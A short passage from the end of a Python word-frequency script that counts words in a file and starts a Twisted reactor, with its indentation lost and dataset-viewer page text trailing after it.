if len(sys.argv) < 2:
print("Usage: wordfreq.py <file_to_count.txt>")
sys.exit(-1)
l, wfl = wordfreq(sys.argv[1])
print("count: %d" % l)
main(wfl.keys())
reactor.run()
|
Subsets and Splits
No community queries yet
The top public SQL queries from the community will appear here once available.